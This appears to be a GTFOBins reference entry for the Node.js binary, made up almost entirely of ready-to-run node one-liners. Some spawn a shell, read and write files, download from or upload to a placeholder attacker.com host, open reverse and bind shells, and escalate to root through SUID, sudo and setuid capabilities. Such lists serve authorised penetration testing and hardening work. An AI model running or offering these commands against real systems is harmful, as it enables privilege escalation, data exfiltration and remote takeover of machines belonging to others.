GTFOBins.github.io/_gtfobins/node.md
2021-02-20 12:17:28 +01:00

1.9 KiB

functions
shell file-write file-read file-download file-upload reverse-shell bind-shell suid sudo capabilities
code
node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'
code
node -e 'fs.writeFileSync("file_to_write", "DATA")'
code
node -e 'process.stdout.write(fs.readFileSync("/bin/ls"))'
description code
Fetch a remote file via HTTP GET request. export URL=http://attacker.com/file_to_get export LFILE=file_to_save node -e 'http.get(process.env.URL, res => res.pipe(fs.createWriteStream(process.env.LFILE)))'
description code
Send a local file via HTTP POST request. export URL=http://attacker.com export LFILE=file_to_send node -e 'fs.createReadStream(process.env.LFILE).pipe(http.request(process.env.URL))'
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. export RHOST=attacker.com export RPORT=12345 node -e 'sh = child_process.spawn("/bin/sh"); net.connect(process.env.RPORT, process.env.RHOST, function () { this.pipe(sh.stdin); sh.stdout.pipe(this); sh.stderr.pipe(this); })'
description code
Run `nc target.com 12345` on the attacker box to connect to the shell. export LPORT=12345 node -e 'sh = child_process.spawn("/bin/sh"); net.createServer(function (client) { client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }).listen(process.env.LPORT)'
code
./node -e 'child_process.spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]})'
code
sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'
code
./node -e 'process.setuid(0); child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'